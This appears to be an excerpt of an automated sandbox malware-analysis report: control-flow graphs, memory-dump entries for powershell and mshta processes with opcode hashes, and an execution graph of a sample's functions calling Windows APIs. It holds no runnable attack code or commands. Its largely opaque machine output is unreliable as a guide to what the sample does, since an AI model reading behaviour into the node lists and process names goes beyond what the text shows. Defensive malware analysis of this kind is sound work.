                                                                                              control_flow_graph 26 7fe89ad26e9-7fe89ad2799 27 7fe89ad2c7d-7fe89ad2d36 26->27 28 7fe89ad279f-7fe89ad27a9 26->28 29 7fe89ad27ab-7fe89ad27b8 28->29 30 7fe89ad27c2-7fe89ad27c9 28->30 29->30 34 7fe89ad27ba-7fe89ad27c0 29->34 31 7fe89ad27cb-7fe89ad27de 30->31 32 7fe89ad27e0 30->32 35 7fe89ad27e2-7fe89ad27e4 31->35 32->35 34->30 37 7fe89ad27ea-7fe89ad27f6 35->37 38 7fe89ad2bf8-7fe89ad2c02 35->38 37->27 42 7fe89ad27fc-7fe89ad2806 37->42 40 7fe89ad2c04-7fe89ad2c14 38->40 41 7fe89ad2c15-7fe89ad2c25 38->41 43 7fe89ad2c27-7fe89ad2c2b 41->43 44 7fe89ad2c32-7fe89ad2c7c 41->44 45 7fe89ad2808-7fe89ad2815 42->45 46 7fe89ad2822-7fe89ad2832 42->46 43->44 45->46 48 7fe89ad2817-7fe89ad2820 45->48 46->38 53 7fe89ad2838-7fe89ad286c 46->53 48->46 53->38 58 7fe89ad2872-7fe89ad287e 53->58 58->27 59 7fe89ad2884-7fe89ad288e 58->59 60 7fe89ad28a7-7fe89ad28ac 59->60 61 7fe89ad2890-7fe89ad289d 59->61 60->38 63 7fe89ad28b2-7fe89ad28b7 60->63 61->60 62 7fe89ad289f-7fe89ad28a5 61->62 62->60 63->38 64 7fe89ad28bd-7fe89ad28c2 63->64 64->38 66 7fe89ad28c8-7fe89ad28d7 64->66 67 7fe89ad28d9-7fe89ad28e3 66->67 68 7fe89ad28e7 66->68 69 7fe89ad28e5 67->69 70 7fe89ad2903-7fe89ad298e 67->70 71 7fe89ad28ec-7fe89ad28f9 68->71 69->71 78 7fe89ad29a2-7fe89ad29c4 70->78 79 7fe89ad2990-7fe89ad299b 70->79 71->70 72 7fe89ad28fb-7fe89ad2901 71->72 72->70 80 7fe89ad29c6-7fe89ad29d0 78->80 81 7fe89ad29d4 78->81 79->78 82 7fe89ad29d2 80->82 83 7fe89ad29f0-7fe89ad2a7e 80->83 84 7fe89ad29d9-7fe89ad29e6 81->84 82->84 91 7fe89ad2a92-7fe89ad2ab0 83->91 92 7fe89ad2a80-7fe89ad2a8b 83->92 84->83 85 7fe89ad29e8-7fe89ad29ee 84->85 85->83 93 7fe89ad2ab2-7fe89ad2abc 91->93 94 7fe89ad2ac0 91->94 92->91 95 7fe89ad2add-7fe89ad2b6d 93->95 96 7fe89ad2abe 93->96 97 7fe89ad2ac5-7fe89ad2ad3 94->97 104 7fe89ad2b81-7fe89ad2bda 95->104 105 7fe89ad2b6f-7fe89ad2b7a 95->105 96->97 97->95 98 7fe89ad2ad5-7fe89ad2adb 97->98 98->95 108 7fe89ad2be2-7fe89ad2bf7 104->108 105->104
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.520654537.000007FE89AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7fe89ad0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3c37bb654c2b82888d0cc64185fc248188e3c552fed1286ae564aaabe794a9cc
                                                                                              • Instruction ID: 65a68241c5234fcf069ecc155ac404758362386f3a5fc6da72771080f630a766
                                                                                              • Opcode Fuzzy Hash: 3c37bb654c2b82888d0cc64185fc248188e3c552fed1286ae564aaabe794a9cc
                                                                                              • Instruction Fuzzy Hash: E422163090CB894FE79ADB2C94506797BE2FF9A344F2401EED44EC72A3DA25AC56C741

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 109 7fe89ad0f0d-7fe89ad0f96 111 7fe89ad0f9c-7fe89ad0fa6 109->111 112 7fe89ad1098-7fe89ad1124 109->112 113 7fe89ad0fa8-7fe89ad0fb5 111->113 114 7fe89ad0fbf-7fe89ad0fee 111->114 120 7fe89ad112a-7fe89ad119e 112->120 121 7fe89ad11c1-7fe89ad11cb 112->121 113->114 115 7fe89ad0fb7-7fe89ad0fbd 113->115 114->112 128 7fe89ad0ff4-7fe89ad0ffe 114->128 115->114 141 7fe89ad11a6-7fe89ad11be 120->141 122 7fe89ad11cd-7fe89ad11d7 121->122 123 7fe89ad11d8-7fe89ad11e8 121->123 126 7fe89ad11ea-7fe89ad11ee 123->126 127 7fe89ad11f5-7fe89ad121a 123->127 126->127 129 7fe89ad1017-7fe89ad1077 128->129 130 7fe89ad1000-7fe89ad100d 128->130 139 7fe89ad108b-7fe89ad1097 129->139 140 7fe89ad1079-7fe89ad1084 129->140 130->129 131 7fe89ad100f-7fe89ad1015 130->131 131->129 140->139 141->121
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.520654537.000007FE89AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_7fe89ad0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4f94bc3bf8c2bb0961f6f93dd5de84350728614960e821cd92a7850c4583c545
                                                                                              • Instruction ID: 2a61d2119196e51b4371269a920fe9837bde49110811efd67e6d70d14e97095c
                                                                                              • Opcode Fuzzy Hash: 4f94bc3bf8c2bb0961f6f93dd5de84350728614960e821cd92a7850c4583c545
                                                                                              • Instruction Fuzzy Hash: 21A1E120A0DBCA0FE747973C58642657FE1EF57254B2900EBD48DCB1A3D5189C5AC362
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000003.487052744.0000000003900000.00000010.00000800.00020000.00000000.sdmp, Offset: 03900000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_3_3900000_mshta.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                              • Instruction ID: bf534c5d5e079a43775a56ef84fc6a4a5edc9a47472590f70e00e45a97898221
                                                                                              • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                              • Instruction Fuzzy Hash:
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000003.487052744.0000000003900000.00000010.00000800.00020000.00000000.sdmp, Offset: 03900000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_3_3900000_mshta.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                              • Instruction ID: bf534c5d5e079a43775a56ef84fc6a4a5edc9a47472590f70e00e45a97898221
                                                                                              • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                              • Instruction Fuzzy Hash:
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000003.487052744.0000000003900000.00000010.00000800.00020000.00000000.sdmp, Offset: 03900000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_3_3900000_mshta.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                              • Instruction ID: bf534c5d5e079a43775a56ef84fc6a4a5edc9a47472590f70e00e45a97898221
                                                                                              • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                              • Instruction Fuzzy Hash:
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000003.487052744.0000000003900000.00000010.00000800.00020000.00000000.sdmp, Offset: 03900000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_3_3900000_mshta.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                              • Instruction ID: bf534c5d5e079a43775a56ef84fc6a4a5edc9a47472590f70e00e45a97898221
                                                                                              • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                              • Instruction Fuzzy Hash:
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000003.487052744.0000000003900000.00000010.00000800.00020000.00000000.sdmp, Offset: 03900000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_3_3900000_mshta.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                              • Instruction ID: bf534c5d5e079a43775a56ef84fc6a4a5edc9a47472590f70e00e45a97898221
                                                                                              • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                              • Instruction Fuzzy Hash:

                                                                                              Execution Graph

                                                                                              Execution Coverage:28.6%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:4.5%
                                                                                              Total number of Nodes:1845
                                                                                              Total number of Limit Nodes:99
                                                                                              execution_graph 11201 40c640 11202 404bee 7 API calls 11201->11202 11203 40c656 11202->11203 11204 40c70f 11203->11204 11205 404bee 7 API calls 11203->11205 11206 40c66b 11205->11206 11207 40c708 11206->11207 11209 404bee 7 API calls 11206->11209 11208 402bab 2 API calls 11207->11208 11208->11204 11210 40c683 11209->11210 11211 40c701 11210->11211 11212 404bee 7 API calls 11210->11212 11213 402bab 2 API calls 11211->11213 11216 40c694 11212->11216 11213->11207 11214 40c6f8 11215 402bab 2 API calls 11214->11215 11215->11211 11216->11214 11228 40c522 11216->11228 11218 40c6a9 11219 40c6ef 11218->11219 11221 405872 4 API calls 11218->11221 11220 402bab 2 API calls 11219->11220 11220->11214 11222 40c6c5 11221->11222 11223 405872 4 API calls 11222->11223 11224 40c6d5 11223->11224 11225 405872 4 API calls 11224->11225 11226 40c6e7 11225->11226 11227 402bab 2 API calls 11226->11227 11227->11219 11229 402b7c 2 API calls 11228->11229 11230 40c542 11229->11230 11230->11218 9846 409046 9859 413b28 9846->9859 9848 40906d 9850 405b6f 6 API calls 9848->9850 9849 40904e 9849->9848 9851 403fbf 7 API calls 9849->9851 9852 40907c 9850->9852 9851->9848 9853 409092 9852->9853 9863 409408 9852->9863 9855 4090a3 9853->9855 9858 402bab 2 API calls 9853->9858 9857 402bab 2 API calls 9857->9853 9858->9855 9860 413b31 9859->9860 9861 413b38 9859->9861 9862 404056 7 API calls 9860->9862 9861->9849 9862->9861 9865 409413 9863->9865 9864 40908c 9864->9857 9865->9864 9877 409d36 9865->9877 9868 40945c 9983 40a35d 9868->9983 9878 409d43 9877->9878 9879 40a35d 5 API calls 9878->9879 9880 409d55 9879->9880 9881 4031e5 4 API calls 9880->9881 9882 409d8b 9881->9882 9883 4031e5 4 API calls 9882->9883 9884 409dd0 9883->9884 9885 405b6f 6 API calls 9884->9885 9917 409423 9884->9917 9887 409df7 9885->9887 9886 409e1c 9888 4031e5 4 API calls 9886->9888 9886->9917 9887->9886 9890 402bab 2 API calls 9887->9890 9889 409e62 9888->9889 9891 4031e5 4 API calls 9889->9891 9890->9886 9892 409e82 9891->9892 9893 4031e5 4 API calls 9892->9893 9894 409ea2 9893->9894 9895 4031e5 4 API calls 9894->9895 9896 409ec2 9895->9896 9897 4031e5 4 API calls 9896->9897 9898 409ee2 9897->9898 9899 4031e5 4 API calls 9898->9899 9900 409f02 9899->9900 9901 4031e5 4 API calls 9900->9901 9902 409f22 9901->9902 9903 4031e5 4 API calls 9902->9903 9906 409f42 9903->9906 9904 40a19b 9905 408b2c 5 API calls 9904->9905 9905->9917 9906->9904 9907 409fa3 9906->9907 9908 405b6f 6 API calls 9907->9908 9907->9917 9909 409fbd 9908->9909 9910 40a02c 9909->9910 9912 402bab 2 API calls 9909->9912 9911 40a16d 9910->9911 9913 4031e5 4 API calls 9910->9913 9914 402bab 2 API calls 9911->9914 9911->9917 9915 409fd7 9912->9915 9916 40a070 9913->9916 9914->9917 9918 405b6f 6 API calls 9915->9918 9919 4031e5 4 API calls 9916->9919 9917->9868 9939 4056bf 9917->9939 9921 409fe5 9918->9921 9920 40a090 9919->9920 9923 4031e5 4 API calls 9920->9923 9921->9910 9922 402bab 2 API calls 9921->9922 9924 409fff 9922->9924 9925 40a0b0 9923->9925 9926 405b6f 6 API calls 9924->9926 9928 4031e5 4 API calls 9925->9928 9927 40a00d 9926->9927 9927->9910 9930 40a021 9927->9930 9929 40a0d0 9928->9929 9932 4031e5 4 API calls 9929->9932 9931 402bab 2 API calls 9930->9931 9931->9917 9933 40a0f0 9932->9933 9934 4031e5 4 API calls 9933->9934 9935 40a110 9934->9935 9936 40a134 9935->9936 9937 4031e5 4 API calls 9935->9937 9936->9911 9993 408b2c 9936->9993 9937->9936 9940 402b7c 2 API calls 9939->9940 9942 4056cd 9940->9942 9941 4056d4 9944 408c4d 9941->9944 9942->9941 9943 402b7c 2 API calls 9942->9943 9943->9941 9945 413ba4 7 API calls 9944->9945 9946 408c5c 9945->9946 9947 408f02 9946->9947 9948 408f3a 9946->9948 9951 40903e 9946->9951 9949 405b6f 6 API calls 9947->9949 9950 405b6f 6 API calls 9948->9950 9952 408f0c 9949->9952 9965 408f51 9950->9965 9967 413aca 9951->9967 9952->9951 9953 40a1b6 15 API calls 9952->9953 9955 408f31 9952->9955 9953->9955 9954 402bab 2 API calls 9954->9951 9955->9954 9956 405b6f 6 API calls 9956->9965 9958 409031 9959 402bab 2 API calls 9958->9959 9959->9955 9960 409022 9961 402bab 2 API calls 9960->9961 9962 409028 9961->9962 9963 402bab 2 API calls 9962->9963 9963->9955 9964 402bab GetProcessHeap HeapFree 9964->9965 9965->9951 9965->9955 9965->9956 9965->9958 9965->9960 9965->9964 9996 4044ee 9965->9996 10006 40a1b6 9965->10006 9968 413ad7 9967->9968 9976 409451 9967->9976 9969 405781 4 API calls 9968->9969 9970 413af0 9969->9970 9971 405781 4 API calls 9970->9971 9972 413afe 9971->9972 9973 405762 4 API calls 9972->9973 9974 413b0e 9973->9974 9975 405781 4 API calls 9974->9975 9974->9976 9975->9976 9977 405695 9976->9977 9978 4056a0 9977->9978 9982 4056b9 9977->9982 9979 402bab 2 API calls 9978->9979 9980 4056b3 9979->9980 9981 402bab 2 API calls 9980->9981 9981->9982 9982->9868 9984 40a368 9983->9984 9985 40a39a 9983->9985 9989 4031e5 4 API calls 9984->9989 9986 40a3af 9985->9986 9987 4031e5 4 API calls 9985->9987 9988 40a3ca 9986->9988 9990 408b2c 5 API calls 9986->9990 9987->9986 9991 408b2c 5 API calls 9988->9991 9992 40a38a 9988->9992 9989->9992 9990->9988 9991->9992 9992->9864 9994 4031e5 4 API calls 9993->9994 9995 408b3e FreeLibrary 9994->9995 9995->9911 9997 402b7c 2 API calls 9996->9997 9998 404512 9997->9998 10000 404585 GetLastError 9998->10000 10001 402bab 2 API calls 9998->10001 10004 402b7c 2 API calls 9998->10004 10005 40457c 9998->10005 10040 4044a7 9998->10040 10002 404592 10000->10002 10000->10005 10001->9998 10003 402bab 2 API calls 10002->10003 10003->10005 10004->9998 10005->9965 10007 40a202 10006->10007 10008 40a1c3 10006->10008 10043 405f08 10007->10043 10010 405b6f 6 API calls 10008->10010 10012 40a1d0 10010->10012 10011 40a1fc 10011->9965 10012->10011 10014 40a1f3 10012->10014 10050 40a45b 10012->10050 10017 402bab 2 API calls 10014->10017 10015 402bab 2 API calls 10015->10011 10017->10011 10018 405b6f 6 API calls 10020 40a245 10018->10020 10019 40a25d 10021 405b6f 6 API calls 10019->10021 10020->10019 10023 413a58 14 API calls 10020->10023 10022 40a26b 10021->10022 10027 40a284 10022->10027 10032 40a28b 10022->10032 10162 40955b 10022->10162 10024 40a257 10023->10024 10026 402bab 2 API calls 10024->10026 10025 405b6f 6 API calls 10028 40a297 10025->10028 10026->10019 10030 402bab 2 API calls 10027->10030 10033 40a2b0 10028->10033 10037 40a2b7 10028->10037 10169 40968e 10028->10169 10030->10032 10031 405b6f 6 API calls 10031->10037 10032->10025 10035 402bab 2 API calls 10033->10035 10035->10037 10036 40a333 10036->10015 10037->10031 10037->10036 10039 402bab 2 API calls 10037->10039 10179 4098a7 10037->10179 10039->10037 10041 4031e5 4 API calls 10040->10041 10042 4044b9 GetPrivateProfileStringW 10041->10042 10042->9998 10044 4031e5 4 API calls 10043->10044 10045 405f1d 10044->10045 10046 405f55 10045->10046 10047 402b7c 2 API calls 10045->10047 10046->10011 10046->10018 10046->10019 10046->10036 10048 405f36 10047->10048 10048->10046 10049 4031e5 4 API calls 10048->10049 10049->10046 10188 40642c 10050->10188 10052 40a469 10053 40c4ff 10052->10053 10191 4047e6 10052->10191 10053->10014 10056 4040bb 13 API calls 10057 40bf88 10056->10057 10057->10053 10058 403c90 9 API calls 10057->10058 10059 40bfaa 10058->10059 10060 402b7c 2 API calls 10059->10060 10062 40bfc1 10060->10062 10061 40c4f3 10063 403f9e 5 API calls 10061->10063 10064 40c3aa 10062->10064 10198 40a423 10062->10198 10063->10053 10064->10061 10067 4056bf 2 API calls 10064->10067 10071 40c4e3 10064->10071 10065 402bab 2 API calls 10065->10061 10069 40c3d2 10067->10069 10069->10071 10073 4040bb 13 API calls 10069->10073 10070 405f08 4 API calls 10072 40c005 10070->10072 10071->10065 10074 40c021 10072->10074 10201 40a43f 10072->10201 10075 40c3f3 10073->10075 10077 4031e5 4 API calls 10074->10077 10078 40c4d1 10075->10078 10258 405a52 10075->10258 10082 40c034 10077->10082 10081 413aca 4 API calls 10078->10081 10085 40c4dd 10081->10085 10088 4031e5 4 API calls 10082->10088 10083 40c411 10263 405a87 10083->10263 10084 402bab 2 API calls 10084->10074 10087 405695 2 API calls 10085->10087 10087->10071 10094 40c04d 10088->10094 10089 40c4b3 10090 402bab 2 API calls 10089->10090 10092 40c4cb 10090->10092 10091 405a52 4 API calls 10102 40c423 10091->10102 10093 403f9e 5 API calls 10092->10093 10093->10078 10096 4031e5 4 API calls 10094->10096 10095 405a87 4 API calls 10095->10102 10097 40c085 10096->10097 10098 4031e5 4 API calls 10097->10098 10100 40c09c 10098->10100 10099 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 10099->10102 10103 4031e5 4 API calls 10100->10103 10101 402bab 2 API calls 10101->10102 10102->10089 10102->10091 10102->10095 10102->10099 10102->10101 10104 40c0b3 10103->10104 10105 4031e5 4 API calls 10104->10105 10106 40c0ca 10105->10106 10107 4031e5 4 API calls 10106->10107 10108 40c0e7 10107->10108 10109 4031e5 4 API calls 10108->10109 10110 40c100 10109->10110 10111 4031e5 4 API calls 10110->10111 10112 40c119 10111->10112 10113 4031e5 4 API calls 10112->10113 10114 40c132 10113->10114 10115 4031e5 4 API calls 10114->10115 10116 40c14b 10115->10116 10117 4031e5 4 API calls 10116->10117 10118 40c164 10117->10118 10119 4031e5 4 API calls 10118->10119 10120 40c17d 10119->10120 10121 4031e5 4 API calls 10120->10121 10122 40c196 10121->10122 10123 4031e5 4 API calls 10122->10123 10124 40c1af 10123->10124 10125 4031e5 4 API calls 10124->10125 10126 40c1c8 10125->10126 10127 4031e5 4 API calls 10126->10127 10128 40c1de 10127->10128 10129 4031e5 4 API calls 10128->10129 10130 40c1f4 10129->10130 10131 4031e5 4 API calls 10130->10131 10132 40c20d 10131->10132 10133 4031e5 4 API calls 10132->10133 10134 40c226 10133->10134 10135 4031e5 4 API calls 10134->10135 10136 40c23f 10135->10136 10137 4031e5 4 API calls 10136->10137 10138 40c258 10137->10138 10139 4031e5 4 API calls 10138->10139 10140 40c273 10139->10140 10141 4031e5 4 API calls 10140->10141 10142 40c28a 10141->10142 10143 4031e5 4 API calls 10142->10143 10146 40c2d5 10143->10146 10144 40c3a2 10145 402bab 2 API calls 10144->10145 10145->10064 10146->10144 10147 4031e5 4 API calls 10146->10147 10148 40c315 10147->10148 10149 40c38b 10148->10149 10204 404866 10148->10204 10151 403c40 5 API calls 10149->10151 10153 40c397 10151->10153 10154 403c40 5 API calls 10153->10154 10154->10144 10155 40c382 10157 403c40 5 API calls 10155->10157 10157->10149 10159 406c4c 6 API calls 10160 40c355 10159->10160 10160->10155 10228 4126a7 10160->10228 10164 40956d 10162->10164 10168 409673 10162->10168 10163 408b45 6 API calls 10163->10164 10164->10163 10165 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10164->10165 10166 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 10164->10166 10167 402bab GetProcessHeap HeapFree 10164->10167 10164->10168 10165->10164 10166->10164 10167->10164 10168->10027 10170 4040bb 13 API calls 10169->10170 10178 4096a9 10170->10178 10171 40989f 10171->10033 10172 409896 10173 403f9e 5 API calls 10172->10173 10173->10171 10175 408b45 6 API calls 10175->10178 10176 402bab GetProcessHeap HeapFree 10176->10178 10177 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 10177->10178 10178->10171 10178->10172 10178->10175 10178->10176 10178->10177 10427 4059d8 10178->10427 10180 4040bb 13 API calls 10179->10180 10187 4098c1 10180->10187 10181 4099fb 10181->10037 10182 4099f3 10183 403f9e 5 API calls 10182->10183 10183->10181 10184 402bab GetProcessHeap HeapFree 10184->10187 10185 4059d8 4 API calls 10185->10187 10186 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 10186->10187 10187->10181 10187->10182 10187->10184 10187->10185 10187->10186 10189 4031e5 4 API calls 10188->10189 10190 406441 GetNativeSystemInfo 10189->10190 10190->10052 10192 4031e5 4 API calls 10191->10192 10195 40480a 10192->10195 10193 40485d 10193->10053 10193->10056 10194 4031e5 4 API calls 10194->10195 10195->10193 10195->10194 10196 40484f 10195->10196 10197 403c40 5 API calls 10196->10197 10197->10193 10199 4031e5 4 API calls 10198->10199 10200 40a435 10199->10200 10200->10070 10202 4031e5 4 API calls 10201->10202 10203 40a451 10202->10203 10203->10084 10205 4031e5 4 API calls 10204->10205 10206 40487c 10205->10206 10206->10155 10207 406c4c 10206->10207 10268 4068eb 10207->10268 10209 406e02 10209->10159 10210 406cab 10280 40469b 10210->10280 10211 406c6c 10211->10209 10211->10210 10277 406894 10211->10277 10218 406df1 10219 40469b 4 API calls 10218->10219 10219->10209 10220 406cef 10220->10218 10221 4031e5 4 API calls 10220->10221 10222 406d26 10221->10222 10222->10218 10223 40771e 6 API calls 10222->10223 10227 406d57 10223->10227 10224 406da2 10225 4031e5 4 API calls 10224->10225 10225->10218 10227->10224 10293 4068b0 10227->10293 10229 4126bb 10228->10229 10230 4126d1 10228->10230 10231 412840 10229->10231 10349 40488c 10229->10349 10230->10231 10355 407055 10230->10355 10231->10155 10235 412837 10237 403c40 5 API calls 10235->10237 10237->10231 10239 4070ff 6 API calls 10239->10235 10240 407055 6 API calls 10241 412742 10240->10241 10242 40719a 6 API calls 10241->10242 10247 41281e 10241->10247 10243 41276e 10242->10243 10244 412804 10243->10244 10371 406f4a 10243->10371 10399 4070ff 10244->10399 10247->10239 10248 41279a 10377 412553 10248->10377 10421 405907 10258->10421 10260 405a61 10261 405a76 10260->10261 10262 405907 4 API calls 10260->10262 10261->10083 10262->10260 10264 402b7c 2 API calls 10263->10264 10266 405a99 10264->10266 10267 405ade 10266->10267 10424 40595e 10266->10424 10267->10102 10296 4076a8 10268->10296 10270 406913 10271 406a61 10270->10271 10272 40771e 6 API calls 10270->10272 10271->10211 10273 406949 10272->10273 10273->10271 10274 40771e 6 API calls 10273->10274 10275 404678 4 API calls 10273->10275 10302 4046c2 10273->10302 10274->10273 10275->10273 10278 4031e5 4 API calls 10277->10278 10279 4068a6 10278->10279 10279->10211 10281 4046b4 10280->10281 10282 4046a4 10280->10282 10281->10209 10284 404678 10281->10284 10283 4031e5 4 API calls 10282->10283 10283->10281 10285 4031e5 4 API calls 10284->10285 10286 40468b 10285->10286 10286->10209 10287 40771e 10286->10287 10288 407737 10287->10288 10292 407748 10287->10292 10289 407644 6 API calls 10288->10289 10290 407741 10289->10290 10291 406baa 6 API calls 10290->10291 10291->10292 10292->10220 10294 4031e5 4 API calls 10293->10294 10295 4068c2 10294->10295 10295->10227 10297 4076c1 10296->10297 10301 4076d2 10296->10301 10310 407644 10297->10310 10301->10270 10303 4046d3 10302->10303 10304 4046d9 10302->10304 10345 40464c 10303->10345 10306 404678 4 API calls 10304->10306 10309 4046e9 10304->10309 10306->10309 10307 404714 10307->10273 10308 40469b 4 API calls 10308->10307 10309->10307 10309->10308 10311 407653 10310->10311 10312 407661 10310->10312 10311->10312 10318 406a6b 10311->10318 10314 406baa 10312->10314 10315 406bbb 10314->10315 10317 406bc8 10314->10317 10315->10317 10326 407402 10315->10326 10317->10301 10322 406a81 10318->10322 10319 402b7c 2 API calls 10319->10322 10320 406b8b 10320->10312 10321 406894 4 API calls 10321->10322 10322->10319 10322->10320 10322->10321 10323 406b96 10322->10323 10324 402bab 2 API calls 10322->10324 10325 402bab 2 API calls 10323->10325 10324->10322 10325->10320 10327 407644 6 API calls 10326->10327 10328 407412 10327->10328 10329 402b7c 2 API calls 10328->10329 10336 407450 10328->10336 10330 407483 10329->10330 10331 402b7c 2 API calls 10330->10331 10330->10336 10333 4074ce 10331->10333 10332 4074da 10334 4068cc 2 API calls 10332->10334 10333->10332 10335 402b7c 2 API calls 10333->10335 10334->10336 10339 40751f 10335->10339 10336->10317 10337 40752b 10338 4068cc 2 API calls 10337->10338 10338->10332 10339->10337 10341 4068cc 10339->10341 10342 4068d6 10341->10342 10343 4068e3 10341->10343 10342->10343 10344 402bab GetProcessHeap HeapFree 10342->10344 10343->10337 10344->10343 10346 404666 10345->10346 10347 404659 10345->10347 10346->10304 10348 4031e5 4 API calls 10347->10348 10348->10346 10350 4047e6 5 API calls 10349->10350 10351 404897 10350->10351 10352 40489c 10351->10352 10407 4047c7 10351->10407 10352->10230 10356 40706f 10355->10356 10357 407084 10355->10357 10356->10357 10358 407644 6 API calls 10356->10358 10362 4070e4 10357->10362 10410 406fd2 10357->10410 10359 40707d 10358->10359 10361 406baa 6 API calls 10359->10361 10361->10357 10362->10235 10363 40719a 10362->10363 10364 4071b0 10363->10364 10366 4071c5 10363->10366 10365 407644 6 API calls 10364->10365 10364->10366 10367 4071be 10365->10367 10369 406fd2 4 API calls 10366->10369 10370 407226 10366->10370 10368 406baa 6 API calls 10367->10368 10368->10366 10369->10370 10370->10240 10370->10247 10372 406f64 10371->10372 10375 406f75 10371->10375 10373 407644 6 API calls 10372->10373 10374 406f6e 10373->10374 10376 406baa 6 API calls 10374->10376 10375->10248 10376->10375 10418 4060ac 10377->10418 10400 407116 10399->10400 10401 40712b 10399->10401 10400->10401 10402 407644 6 API calls 10400->10402 10404 406fd2 4 API calls 10401->10404 10406 407187 10401->10406 10403 407124 10402->10403 10405 406baa 6 API calls 10403->10405 10404->10406 10405->10401 10406->10247 10408 4031e5 4 API calls 10407->10408 10409 4047d9 10408->10409 10409->10230 10411 406fde 10410->10411 10412 407027 10411->10412 10413 4031e5 4 API calls 10411->10413 10412->10362 10414 406ffa 10413->10414 10415 4031e5 4 API calls 10414->10415 10416 407011 10415->10416 10417 4031e5 4 API calls 10416->10417 10417->10412 10419 4031e5 4 API calls 10418->10419 10420 4060bb 10419->10420 10420->10420 10422 4031e5 4 API calls 10421->10422 10423 40591a 10422->10423 10423->10260 10425 4031e5 4 API calls 10424->10425 10426 405971 10425->10426 10426->10266 10428 4031e5 4 API calls 10427->10428 10429 4059ed 10428->10429 10430 405a38 10429->10430 10431 402b7c 2 API calls 10429->10431 10430->10178 10432 405a16 10431->10432 10432->10430 10433 4031e5 4 API calls 10432->10433 10433->10430 11295 40a349 11296 4098a7 14 API calls 11295->11296 11297 40a359 11296->11297 10512 408952 10533 40823f 10512->10533 10515 408960 10517 4056bf 2 API calls 10515->10517 10518 40896a 10517->10518 10561 408862 10518->10561 10520 413aca 4 API calls 10521 4089d4 10520->10521 10524 405695 2 API calls 10521->10524 10522 408975 10530 4089c4 10522->10530 10569 4087d6 10522->10569 10525 4089df 10524->10525 10530->10520 10531 402bab 2 API calls 10532 40899d 10531->10532 10532->10530 10532->10531 10534 40824d 10533->10534 10535 4031e5 4 API calls 10534->10535 10548 40831b 10534->10548 10536 40826d 10535->10536 10537 4031e5 4 API calls 10536->10537 10538 408289 10537->10538 10539 4031e5 4 API calls 10538->10539 10540 4082a5 10539->10540 10541 4031e5 4 API calls 10540->10541 10542 4082c1 10541->10542 10543 4031e5 4 API calls 10542->10543 10544 4082e2 10543->10544 10545 4031e5 4 API calls 10544->10545 10546 4082ff 10545->10546 10547 4031e5 4 API calls 10546->10547 10547->10548 10548->10515 10549 4083bb 10548->10549 10597 408363 10549->10597 10552 4056bf 2 API calls 10560 4083f4 10552->10560 10553 413aca 4 API calls 10554 4084a0 10553->10554 10555 405695 2 API calls 10554->10555 10556 4084ab 10555->10556 10556->10515 10557 408492 10557->10553 10560->10557 10600 40815d 10560->10600 10615 40805d 10560->10615 10630 404b8f 